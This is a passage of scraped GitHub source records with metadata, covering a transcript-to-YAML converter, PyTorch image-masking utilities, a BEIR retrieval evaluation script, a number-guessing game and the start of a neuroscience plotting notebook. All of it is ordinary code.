+{"seq_id": "72032123369", "text": "#!/usr/bin/env python3\n\nimport sys, os, subprocess\nfrom fileinput import FileInput\nimport os.path\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\n\n# arguments to this script:\n# - meeting number\n# - real time HH:MM when recording starts\n# - crs_id/semester of offering\nif (len(sys.argv) != 4):\n print (sys.argv[0],\"must be invoked with crs_id/semester, meeting-number, astart-time (HH:MM), and \")\n sys.exit()\n\nmtg_nbr = str(sys.argv[2]).zfill(2)\n\n# CS-428+828/202030 5 11:10\n# teaching/CS-428+828/202030/0_nonweb/zoom/talk/05*.srt\n# _data/teaching/CS-428_828/202030/transcript/talk/05.yml\n\nTALK_SRC = 'teaching/' + sys.argv[1] + '/0_nonweb/zoom/talk/' + mtg_nbr + '_otter.ai.srt'\nprint(TALK_SRC)\nTALK_DST = '_data/teaching/' + sys.argv[1].replace('+','_') + '/transcript/talk/' + mtg_nbr + '.yml'\nprint(TALK_DST)\nstarttime = sys.argv[3].split(':')\nstd = timedelta(hours=int(starttime[0]),minutes=int(starttime[1]))\n#atfilepath = sys.argv[2]\n\nwith open(TALK_SRC,'r') as atf, open(TALK_DST, 'w') as ydf:\n curr_hm_stamp = ''\n curr_speaker = ''\n new_block = 0\n for line in atf:\n line = line.strip()\n if (len(line)):\n #print(line)\n if '-->' in line:\n #print ('case: -->')\n startstop = line.split(' ')\n #print(startstop)\n #ydf.write(str(startstop) + '\\n')\n try:\n ts0 = std + datetime.strptime(startstop[0],'%H:%M:%S.%f')\n except:\n ts0 = std + datetime.strptime(startstop[0],'%H:%M:%S,%f')\n if curr_hm_stamp != ts0.strftime('%Hh%M'):\n new_block = 1\n ydf.write(ts0.strftime('%Hh%M') + ':\\n')\n ydf.write(' talks:\\n')\n curr_hm_stamp = ts0.strftime('%Hh%M')\n elif ':' in line:\n #print ('case: :')\n spoken = line.split(':')\n #print(spoken)\n if new_block == 1 or curr_speaker != spoken[0]:\n #spkr = 'SSS'\n #if (spoken[0] == 'Daryl Hepting' or spoken[0] == 'Unknown'):\n ydf.write(' - persid: ' + spoken[0] + '\\n')\n #else:\n #ydf.write(' - persid: SSS\\n')\n ydf.write(' msg: >-\\n')\n curr_speaker = spoken[0]\n #print (' \\\"' + spoken[1])\n #for i in range(2,len(spoken)):\n # print (' ' + spoken[i])\n new_block = 0\n for i in range(1,len(spoken)):\n ydf.write (' ' + spoken[i].strip() + '\\n')\n elif len(line.strip().split()) > 1 or not line.isnumeric():\n #print ('case: len(line.strip().split()) > 1 or line.isalpha()')\n if new_block == 1 :#or curr_speaker != spoken[0]:\n ydf.write(' - persid: ' + spoken[0] + '\\n')\n ydf.write(' msg: >-\\n')\n new_block = 0\n ydf.write (' ' + line.strip() + '\\n')\n", "repo_name": "dhhepting/dhhepting.github.io", "sub_path": "script/000_not-needed/transcribe-talk.py", "file_name": "transcribe-talk.py", "file_ext": "py", "file_size_in_byte": 3122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 25, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 27, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 45, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "name"}]}
+{"seq_id": "8547586610", "text": "import torch\nimport torch.nn.functional as F\nimport torchvision\nimport os\nfrom imagegym.config import cfg\nimport numpy as np\nimport torch\n\ndef create_fixed_mask_missingness(shape:tuple):\n \"\"\"\n use only for chairs dataset since it is always sampling 4096 points\n \"\"\"\n # assert len(x.shape) == 5 #so this is chairs\n bs, ch, h, w, d = shape\n observed_indices = random_indices(4096,h*w*d).unsqueeze(0)\n all = torch.zeros((h*w*d),dtype=bool).flatten()\n all[observed_indices]=True\n observed_mask = all.reshape(h,w,d)\n\n # observed_mask = torch.zeros_like(x,dtype=bool)\n # observed_mask[:,:,observed_indices]=True\n observed_mask = np.tile(observed_mask[np.newaxis,np.newaxis], (bs,ch,1,1,1))\n observed_mask_point = observed_mask[:,0].reshape(observed_mask.shape[0],-1) #bs,h*w\n return observed_mask, observed_mask_point\n \n\ndef random_indices(num_indices, max_idx):\n \"\"\"Generates a set of num_indices random indices (without replacement)\n between 0 and max_idx - 1.\n\n Args:\n num_indices (int): Number of indices to include.\n max_idx (int): Maximum index.\n \"\"\"\n # It is wasteful to compute the entire permutation, but it looks like\n # PyTorch does not have other functions to do this\n permutation = torch.randperm(max_idx)\n # Select first num_indices indices (this will be random since permutation is\n # random)\n return permutation[:num_indices]\n\n\ndef create_mask_missingness(x, missingness):\n \"\"\"\n :param x: input tensor of batch\n :param missingness: missingness value float\n :return: x with missingness applied\n :return: observed mask of non-missingness\n \"\"\" \n if missingness == 1:\n missing_rate = np.random.rand(1) * 0.9 \n elif missingness > 0:\n missing_rate = missingness\n missing_rate = np.random.uniform(low=0,high=missing_rate)\n elif missingness ==0:\n missing_rate = -1\n\n if len(x.shape) == 3: #shapenet\n raise NotImplementedError\n bs, h, ch = x.shape\n w=1\n observed_mask_0 = (np.random.rand(h*w)) > missing_rate\n observed_mask = np.tile(observed_mask_0[np.newaxis, :, np.newaxis], (bs,1,ch))\n observed_mask_point= None\n\n elif len(x.shape) == 4:\n bs, ch, h, w = x.shape\n observed_mask_0 = (np.random.rand(h,w)) > missing_rate\n observed_mask = np.tile(observed_mask_0[np.newaxis,np.newaxis], (bs,ch,1,1))\n observed_mask_point = observed_mask[:,0].reshape(observed_mask.shape[0],-1) #bs,h*w\n\n\n elif len(x.shape) == 5: #chairs\n observed_mask, observed_mask_point = create_fixed_mask_missingness(x.shape) \n # bs, ch, h, w, d = x.shape\n # observed_mask_0 = (np.random.rand(h,w,d)) > missing_rate\n # observed_mask = np.tile(observed_mask_0[np.newaxis,np.newaxis], (bs,ch,1,1,1))\n # observed_mask_point= None\n \n else:\n raise NotImplementedError\n \n # observed_mask_0 = (np.random.rand(h,w)) > missing_rate\n # #TODO change this it fill fail, maybe we can use cfg to get the right dims\n # observed_mask = np.tile(observed_mask_0[np.newaxis,np.newaxis], (bs,ch,1,1))\n \n return x, observed_mask, observed_mask_point\n\ndef mask_to_input(self, input:torch.Tensor, mask:torch.Tensor)-> torch.Tensor:\n '''\n Args:\n input (torch.Tensor): Shape (batch_size, num_points, coordinate_dim or channel_dim).\n coor_mask (torch.Tensor): Shape (batch_size, num_points).\n Returns:\n missing_input (torch.Tensor): Shape (batch_size, num_points_not_masked,coordinate_dim or channel_dim)\n '''\n missing_input = input[mask,:].reshape(input.shape[0],-1,input.shape[2])\n return missing_input\n\n\ndef compute_occlusion_mask(input_size, occlusion_type: str, occlusion_size: int):\n \"\"\"\n Args:\n input_size (tuple): Size of the input image, WxH.\n occlusion_for_task (str): Type of task for getting occlusion\n occlusion_size (tuple): Starting index, Size of the occlusion.\n Returns:\n mask (torch.Tensor): Mask of shape (*input_size).\n \"\"\"\n\n\n # w,h = input_size\n if occlusion_type is None:\n occlusion_mask = torch.ones(*input_size,dtype=bool) #bogus\n return occlusion_mask\n\n index, size = occlusion_size\n number_of_axis = len(input_size)\n\n #occlusion mask is 1s everywhere, 0 at occluded place\n\n if number_of_axis==2:\n if occlusion_type == \"inpainting\":\n occlusion_mask = torch.ones(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size] = False\n\n elif occlusion_type == \"outpainting\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size] = True\n\n elif occlusion_type == \"half\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[:,:input_size[-1]//2] = True\n \n elif number_of_axis==3:\n if occlusion_type == \"inpainting\":\n occlusion_mask = torch.ones(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size,index:index+size] = False\n\n elif occlusion_type == \"outpainting\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[index:index+size,index:index+size,index:index+size] = True\n\n elif occlusion_type == \"half\":\n occlusion_mask = torch.zeros(*input_size,dtype=bool)\n occlusion_mask[:,:,:input_size[-1]//2] = True\n \n else:\n raise NotImplementedError\n\n return occlusion_mask\n\ndef apply_occlusion_mask(coordinates:torch.Tensor, features:torch.Tensor, mask: torch.Tensor):\n '''\n Args:\n coordinates (torch.Tensor): Shape (batch_size, num_points, coordinate_dim)\n features (torch.Tensor): Shape (batch_size, num_points, channel_dim)\n mask (torch.Tensor): Shape (*dim).\n Returns:\n coordinates (torch.Tensor): Shape (batch_size, num_points_not_masked, coordinate_dim).\n features (torch.Tensor): Shape (batch_size, num_points_not_masked, channel_dim).\n '''\n \n coors_masked = coordinates[:, mask.flatten(), :] # [bs, num_points_not_masked, coordinate_dim]\n features_masked = features[:, mask.flatten(), :] # [bs, num_points_not_masked, channel_dim]\n\n return coors_masked, features_masked\n\n#NOT USED\ndef compute_mask_mar(batch, is_training):\n assert cfg.dataset.missing_perc>0\n bs = batch.shape[0]\n if is_training:\n if cfg.dataset.name in [\"shapenet\"]:\n mask = batch[0,:,[0]].expand(bs,-1,-1) #torch.Size([8, 6000, 1])\n mask_point = mask[:,:,0].reshape(mask.shape[0],-1) #bs,h*w\n elif cfg.dataset.name in [\"voxels\"]:\n mask = batch[0].expand(bs,-1,-1,-1,-1) #[bs,1,32,32,32]\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n else:\n mask = batch[0].expand(bs,-1,-1,-1) #[bs,ch,h,w]\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n else:\n if cfg.dataset.name in [\"shapenet\"]:\n mask = torch.ones_like(batch[0,:,[0]].expand(bs,-1,-1))\n mask_point = mask[:,:,0].reshape(mask.shape[0],-1) #bs,h*w\n elif cfg.dataset.name in [\"voxels\"]:\n mask = torch.ones_like(batch[0].expand(bs,-1,-1,-1,-1))#torch.Size([4, 1, 4096])\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n else:\n mask = torch.ones_like(batch[0]).expand(bs,-1,-1,-1) #[bs,ch,h,w]\n mask_point = mask[:,0].reshape(mask.shape[0],-1) #bs,h*w\n return mask, mask_point\n\n\ndef bbox2mask(self, bbox):\n \"\"\"Generate mask tensor from bbox.\n Args:\n bbox: configuration tuple, (top, left, height, width)\n config: Config should have configuration including IMG_SHAPES,\n MAX_DELTA_HEIGHT, MAX_DELTA_WIDTH.\n Returns:\n tf.Tensor: output with shape [B, 1, H, W]\n \"\"\"\n def npmask(bbox, ch, height, width, delta_h, delta_w):\n mask = np.zeros((1, ch, height, width), np.float32)\n # h = np.random.randint(delta_h//2+1)\n # w = np.random.randint(delta_w//2+1)\n h=delta_h\n w=delta_w\n mask[:, :, bbox[0] : bbox[0]+bbox[2],\n bbox[1] : bbox[1]+bbox[3]] = 1.\n return mask\n\n img_shape =cfg.dataset.dims\n height = img_shape[1]\n width = img_shape[2]\n\n mask = npmask(bbox, 1, height, width, 5, 5)\n \n return torch.FloatTensor(mask)\n \ndef compute_neighbors(bs,K,res,pi):\n #res is the bigger one\n #res_org = (res+1)//2\n # bs = x_rec.shape[0]\n # K = x_rec.shape[-1]\n # res = x_rec.shape[-2]\n pi = pi.permute(0,2,1).reshape(bs,K,res,res)\n conv2d = torch.nn.Conv2d(in_channels=K, out_channels=K, kernel_size=3, stride=2, bias=False,groups=K)\n weight = torch.zeros((K, 1, 3, 3),dtype=torch.float).to(cfg.device)\n # print(weight)\n weight[:,:,0,0]=1\n weight[:,:,0,-1]=1\n weight[:,:,-1,0]=1\n weight[:,:,-1,-1]=1\n # weight.requires_grad=False\n # print(weight)\n conv2d.weight = torch.nn.Parameter(weight)\n conv2d.weight.requires_grad=False\n a = conv2d(pi).detach()\n centers = np.arange(1,res,2)\n pi2 = impute_findings(a,pi,centers)\n\n conv2d2 = torch.nn.Conv2d(in_channels=K, out_channels=K, kernel_size=3, stride=1, bias=False, groups=K, padding=1)\n weight = torch.zeros((K, 1, 3, 3),dtype=torch.float).to(cfg.device)\n # print(weight)\n weight[:,:,0,1]=1\n weight[:,:,1,0]=1\n weight[:,:,1,-1]=1\n weight[:,:,-1,1]=1\n # weight.requires_grad=False\n # print(weight)\n conv2d2.weight = torch.nn.Parameter(weight)\n conv2d2.weight.requires_grad=False\n b = conv2d2(pi2).detach()\n centers = np.arange(1,res,2)\n # print(centers)\n centers2 = np.arange(0,res,2)\n # print(centers2)\n pi3 = impute_findings2(b,pi2,centers,centers2)\n return pi3\n\n\ndef impute_findings(source,target,centers):\n for x in centers:\n for y in centers:\n # print(x,y)\n # print((x-1)//2,(y-1)//2)\n target[:,:,x,y] = source[:,:,(x-1)//2,(y-1)//2]/4\n return target\n\ndef impute_findings2(source,target,centers,centers2):\n for x in centers:\n for y in centers2:\n # print(x,y)\n if y==0 or y==centers2[-1]:\n dividend = 3\n else:\n dividend = 4 \n target[:,:,x,y] = source[:,:,x,y]/dividend\n target[:,:,y,x] = source[:,:,y,x]/dividend\n return target\n\ndef neighborhood_filling(centers, prior_imputed_1:torch.Tensor, scale_pixels:int, kernel_size:int=3):\n #prior_imputed_1: (bs,all,K)\n #prior_imputed_1 = reshape\n kernel = np.zeros((scale_pixels+1,scale_pixels+1))\n kernel[0,0]=1\n kernel[0,-1]=1\n kernel[-1,0]=1\n kernel[-1,-1]=1\n kernel = np.asarray(kernel,dtype=bool)\n\n for x in centers-1:\n for y in centers-1:\n image = prior_imputed_1[:,x-scale_pixels//2:x+scale_pixels//2+1,y-scale_pixels//2:y+scale_pixels//2+1]\n result = image[:,kernel]\n values, counts = np.unique(result, return_counts=True)\n ind = np.argmax(counts)\n prior_imputed_1[x,y] = values[ind]\n\n return prior_imputed_1\n\ndef neighborhood_filling_2(centers, prior_imputed_1:torch.Tensor, scale_pixels:int, kernel_size:int=3):\n kernel = np.zeros((scale_pixels+1,scale_pixels+1))\n kernel[0,0]=1\n kernel[0,-1]=1\n kernel[-1,0]=1\n kernel[-1,-1]=1\n kernel = np.asarray(kernel,dtype=bool)\n \n for x in centers-1:\n for y in centers-1:\n image = prior_imputed_1[x-scale_pixels//2:x+scale_pixels//2+1,y-scale_pixels//2:y+scale_pixels//2+1]\n result = image[kernel]\n values, counts = np.unique(result, return_counts=True)\n ind = np.argmax(counts)\n prior_imputed_1[x,y] = values[ind]\n\n return prior_imputed_1", "repo_name": "bkoyuncu/vamoh", "sub_path": "imagegym/utils/mask.py", "file_name": "mask.py", "file_ext": "py", "file_size_in_byte": 12636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.randperm", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.ones", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 145, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 153, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 171, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 171, "usage_type": "name"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 174, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 174, "usage_type": "name"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 177, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 177, "usage_type": "name"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 184, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.ones_like", "line_number": 185, "usage_type": "call"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 187, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 187, "usage_type": "name"}, {"api_name": "torch.ones_like", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 206, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.dataset", "line_number": 215, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 215, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 221, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 230, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 231, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.device", "line_number": 231, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 231, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 239, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 245, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 246, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg.device", "line_number": 246, "usage_type": "attribute"}, {"api_name": "imagegym.config.cfg", "line_number": 246, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 254, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 285, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 300, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 305, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 317, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 318, "usage_type": "call"}]}
+{"seq_id": "16945607900", "text": "from beir import util, LoggingHandler\nfrom beir.datasets.data_loader import GenericDataLoader\nfrom beir.retrieval.evaluation import EvaluateRetrieval\n\nimport pathlib, os, csv, random\nimport sys\nimport argparse\nimport logging\n \n#### Just some code to print debug information to stdout\nlogging.basicConfig(format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO,\n handlers=[LoggingHandler()])\n\ncsv.field_size_limit(sys.maxsize)\n\ndef tsv_reader(input_filepath):\n reader = csv.reader(open(input_filepath, encoding=\"utf-8\"), delimiter=\"\\t\", quoting=csv.QUOTE_MINIMAL)\n for idx, row in enumerate(reader):\n yield idx, row\n\ndef main(dataset, split, data_dir, collection, rankings, k_values):\n #### Provide the data_dir where nfcorpus has been downloaded and unzipped\n if data_dir == None:\n url = \"https://public.ukp.informatik.tu-darmstadt.de/thakur/BEIR/datasets/{}.zip\".format(dataset)\n out_dir = os.path.join(pathlib.Path(__file__).parent.absolute(), \"datasets\")\n data_dir = util.download_and_unzip(url, out_dir)\n\n #### Provide the data_dir where nfcorpus has been downloaded and unzipped\n corpus, queries, qrels = GenericDataLoader(data_folder=data_dir).load(split=split)\n\n inv_map, results = {}, {}\n \n #### Document mappings (from original string to position in tsv file ####\n for idx, row in tsv_reader(collection):\n inv_map[str(idx)] = row[0]\n\n #### Results ####\n for _, row in tsv_reader(rankings):\n qid, doc_id, rank = row[0], row[1], int(row[2])\n if qid != inv_map[str(doc_id)]:\n if qid not in results:\n results[qid] = {inv_map[str(doc_id)]: 1 / (rank + 1)}\n else:\n results[qid][inv_map[str(doc_id)]] = 1 / (rank + 1)\n\n #### Evaluate your retrieval using NDCG@k, MAP@K ...\n evaluator = EvaluateRetrieval()\n ndcg, _map, recall, precision = evaluator.evaluate(qrels, results, k_values)\n mrr = EvaluateRetrieval.evaluate_custom(qrels, results, k_values, metric='mrr')\n\n #### Print top-k documents retrieved ####\n top_k = 10\n\n query_id, ranking_scores = random.choice(list(results.items()))\n scores_sorted = sorted(ranking_scores.items(), key=lambda item: item[1], reverse=True)\n logging.info(\"Query : %s\\n\" % queries[query_id])\n\n # for rank in range(top_k):\n # doc_id = scores_sorted[rank][0]\n # # Format: Rank x: ID [Title] Body\n # logging.info(\"Rank %d: %s [%s] - %s\\n\" % (rank+1, doc_id, corpus[doc_id].get(\"title\"), corpus[doc_id].get(\"text\")))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', type=str, help=\"BEIR Dataset Name, eg. nfcorpus\")\n parser.add_argument('--split', type=str, default=\"test\")\n parser.add_argument('--data_dir', type=str, default=None, help='Path to a BEIR repository (incase already downloaded or custom)')\n parser.add_argument('--collection', type=str, help='Path to the ColBERT collection file')\n parser.add_argument('--rankings', required=True, type=str, help='Path to the ColBERT generated rankings file')\n parser.add_argument('--k_values', nargs='+', type=int, default=[1,3,5,10,100])\n args = parser.parse_args()\n main(**vars(args))\n\n", "repo_name": "THUDM/P-tuning-v2", "sub_path": "PT-Retrieval/colbert/colbert/beir_eval.py", "file_name": "beir_eval.py", "file_ext": "py", "file_size_in_byte": 3323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1727, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 13, "usage_type": "attribute"}, {"api_name": "beir.LoggingHandler", "line_number": 14, "usage_type": "call"}, {"api_name": "csv.field_size_limit", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 16, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 19, "usage_type": "call"}, {"api_name": "csv.QUOTE_MINIMAL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 27, "usage_type": "call"}, {"api_name": "beir.util.download_and_unzip", "line_number": 28, "usage_type": "call"}, {"api_name": "beir.util", "line_number": 28, "usage_type": "name"}, {"api_name": "beir.datasets.data_loader.GenericDataLoader", "line_number": 31, "usage_type": "call"}, {"api_name": "beir.retrieval.evaluation.EvaluateRetrieval", "line_number": 49, "usage_type": "call"}, {"api_name": "beir.retrieval.evaluation.EvaluateRetrieval.evaluate_custom", "line_number": 51, "usage_type": "call"}, {"api_name": "beir.retrieval.evaluation.EvaluateRetrieval", "line_number": 51, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 56, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "43094156361", "text": "\n'''Guess Number\nhttps://www.reddit.com/r/dailyprogrammer/comments/pii6j/difficult_challenge_1/\n'''\n\n\nimport string\nfrom random import randint\n# Data modeling\nfrom dataclasses import dataclass, field, asdict\nfrom json import dumps as json_dumps\n# Type hints\nfrom typing import List\nfrom numbers import Integral\n\n\n@dataclass\nclass Model:\n '''Class for guess a random number\n '''\n guesses: List = field(default_factory=lambda: [])\n number: int = randint(0, 100)\n guess_range: List[int] = field(default_factory=lambda: [0, 100])\n \n \n def __post_init__(self):\n '''Execute after class initializes\n '''\n while True:\n #print(self)\n # Get user input\n input_message = f'Guess a number between {self.guess_range[0]} and {self.guess_range[1]}: '\n user_input = input(input_message)\n \n # Check if input is a number\n number_check = True\n try:\n user_input = int(user_input)\n self.guesses.append(user_input)\n except:\n number_check = False\n print(f'\"{user_input}\" is not a number. Please try again.')\n \n # Check if the guess is correct\n if number_check:\n if user_input > self.number:\n self.guess_range[1] = user_input\n print(f'The number is less than \"{user_input}\"')\n elif user_input < self.number:\n self.guess_range[0] = user_input\n print(f'The number is greater than \"{user_input}\"')\n elif user_input == self.number:\n print(f'Good guess! \"{self.number}\" is the correct number.') \n break\n \n \nif __name__ == '__main__':\n M = Model()\n print(json_dumps(asdict(M), indent=2))\n", "repo_name": "fjemi/coding_challenges", "sub_path": "challenges/guess_number.py", "file_name": "guess_number.py", "file_ext": "py", "file_size_in_byte": 1646, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 21, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 23, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 17, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 59, "usage_type": "call"}, {"api_name": "dataclasses.asdict", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "3300970328", "text": "# %% [markdown]\n# ##\nimport os\nimport time\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom matplotlib.patches import Circle\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom scipy.integrate import tplquad\nfrom scipy.special import comb\nfrom scipy.stats import gaussian_kde\nfrom sklearn.metrics import pairwise_distances\n\nimport pymaid\nfrom graspy.utils import pass_to_ranks\nfrom hyppo.ksample import KSample\nfrom src.data import load_metagraph\nfrom src.graph import MetaGraph, preprocess\nfrom src.hierarchy import signal_flow\nfrom src.io import readcsv, savecsv, savefig\nfrom src.visualization import (\n CLASS_COLOR_DICT,\n adjplot,\n barplot_text,\n get_mid_map,\n gridmap,\n matrixplot,\n remove_axis,\n remove_spines,\n set_axes_equal,\n stacked_barplot,\n set_theme,\n)\n\n\n# plotting settings\nrc_dict = {\n \"axes.spines.right\": False,\n \"axes.spines.top\": False,\n \"axes.formatter.limits\": (-3, 3),\n \"figure.figsize\": (6, 3),\n \"figure.dpi\": 100,\n # \"axes.edgecolor\": \"lightgrey\",\n # \"ytick.color\": \"grey\",\n # \"xtick.color\": \"grey\",\n # \"axes.labelcolor\": \"dimgrey\",\n # \"text.color\": \"dimgrey\",\n \"pdf.fonttype\": 42,\n \"ps.fonttype\": 42,\n \"font.family\": \"sans-serif\",\n \"font.sans-serif\": [\"Arial\"],\n}\n\nset_theme(rc_dict=rc_dict, font_scale=1.25)\n\n\nnp.random.seed(8888)\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=True, format=\"png\", dpi=200, **kws)\n savefig(name, foldername=FNAME, save_on=True, format=\"pdf\", dpi=200, **kws)\n\n\ndef stashcsv(df, name, **kws):\n savecsv(df, name, foldername=FNAME, **kws)\n\n\n# load data\nmg = load_metagraph(\"G\")\n# mg = mg.reindex(mg.meta[~mg.meta[\"super\"]].index, use_ids=True)\n\n\ngraph_types = [\"Gad\", \"Gaa\", \"Gdd\", \"Gda\"] # \"Gs\"]\nadjs = []\nfor g in graph_types:\n temp_mg = load_metagraph(g)\n # this line is important, to make the graphs aligned\n temp_mg.reindex(mg.meta.index, use_ids=True)\n temp_adj = temp_mg.adj\n adjs.append(temp_adj)\n\n\n# %%\n\nfig, ax = plt.subplots(2, 2, figsize=(20, 20))\n\n\n# %% [markdown]\n# ##\n\n# %% [markdown]\n# ## Load the 4-color graphs\n\ngraph_types = [\"Gad\", \"Gaa\", \"Gdd\", 